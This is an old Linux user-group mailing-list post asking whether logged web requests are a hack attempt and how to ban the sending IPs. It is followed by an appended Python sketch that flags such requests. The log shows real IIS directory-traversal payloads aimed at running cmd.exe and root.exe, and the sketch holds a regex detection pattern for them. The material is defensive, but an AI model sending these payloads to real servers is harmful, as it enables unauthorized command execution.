[svlug] Is this a hack attempt?

Daevid Vincent daevid at daevid.com
Fri Oct 25 15:45:28 PDT 2002


I run RH8.0 so this sure seems suspicious to me:

1-0 25065 0/508/508 _  6.42 128 0 0.0 130.31 130.31  12.237.249.145
daevid.com GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0

4-0 25068 0/519/519 _  5.86 139 0 0.0 143.76 143.76  12.237.249.145
daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 
5-0 25069 0/518/518 _  5.84 142 0 0.0 99.62 99.62  12.237.249.145
daevid.com GET /scripts/root.exe?/c+dir HTTP/1.0 
6-0 25070 0/531/531 _  6.44 114 0 0.0 129.48 129.48  12.237.249.145
daevid.com GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../.. 
7-0 25071 0/525/525 _  6.93 117 0 0.0 139.17 139.17  12.237.249.145
daevid.com GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. 
8-0 25214 0/503/503 _  5.83 136 0 0.0 118.91 118.91  12.237.249.145
daevid.com GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
9-0 25774 0/271/271 _  4.87 133 0 0.0 119.94 119.94  12.237.249.145
daevid.com GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 
10-0 26526 0/457/457 _  5.36 335 0 0.0 100.78 100.78  12.229.31.145
daevid.com GET /MSADC/root.exe?/c+dir HTTP/1.0 
14-0 26531 0/334/334 _  3.51 119 0 0.0 89.96 89.96  12.237.249.145
daevid.com GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd. 

And so now is there a way I can make a file of IP/domains that are
banned from contacting my server (all ports)?
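
Added example, not part of the original post: a Python sketch that reads status lines in the layout shown above, undoes the nested percent-encoding (`%255c`), and lists the client addresses whose requests target Windows-only paths or contain a traversal sequence. The sample input is constructed; its hostname and addresses are reserved documentation values, and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in the layout of the status lines above. Hostname and
# addresses are reserved documentation values, not taken from the post.
SAMPLE = """\
1-0 25065 0/508/508 _  6.42 128 0 0.0 130.31 130.31  192.0.2.10
example.test GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
2-0 25066 0/12/12 _  0.10 3 0 0.0 0.02 0.02  198.51.100.7
example.test GET /index.html HTTP/1.0
4-0 25068 0/519/519 _  5.86 139 0 0.0 143.76 143.76  192.0.2.10
example.test GET /MSADC/root.exe?/c+dir HTTP/1.0
6-0 25070 0/531/531 _  6.44 114 0 0.0 129.48 129.48  203.0.113.5
example.test GET
/_vti_bin/..%255c../..%255c../winnt/system32/cmd.
"""

# Slot line: "<slot> <pid> ... <client IPv4>"; the request is on the next line(s).
SLOT = re.compile(r"^\d+-\d+\s+\d+\s.*\s(\d{1,3}(?:\.\d{1,3}){3})\s*$")
# Windows/IIS-only targets or a traversal sequence. "cmd." is matched without
# an extension because the status page truncates long requests.
PROBE = re.compile(r"[\\/](?:cmd\.|root\.exe)|[\\/]winnt[\\/]|\.\.[\\/]", re.I)

def fully_decode(s, rounds=3):
    """Undo nested percent-encoding (%255c -> %5c -> backslash)."""
    for _ in range(rounds):
        decoded = unquote(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    return s

def suspicious_clients(text):
    """Return {client IP: number of probe-like requests}."""
    hits, ip, req = {}, None, []
    def flush():
        # Evaluate the request collected for the previous slot, if any.
        if ip and PROBE.search(fully_decode(" ".join(req))):
            hits[ip] = hits.get(ip, 0) + 1
    for line in text.splitlines():
        m = SLOT.match(line)
        if m:
            flush()
            ip, req = m.group(1), []
        elif line.strip():
            req.append(line.strip())  # wrapped request lines are rejoined
    flush()
    return hits

if __name__ == "__main__":
    for addr, count in sorted(suspicious_clients(SAMPLE).items()):
        print(addr, count)
```

The resulting address list can be written to a file and fed to whatever packet filter or access-control mechanism the server uses.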



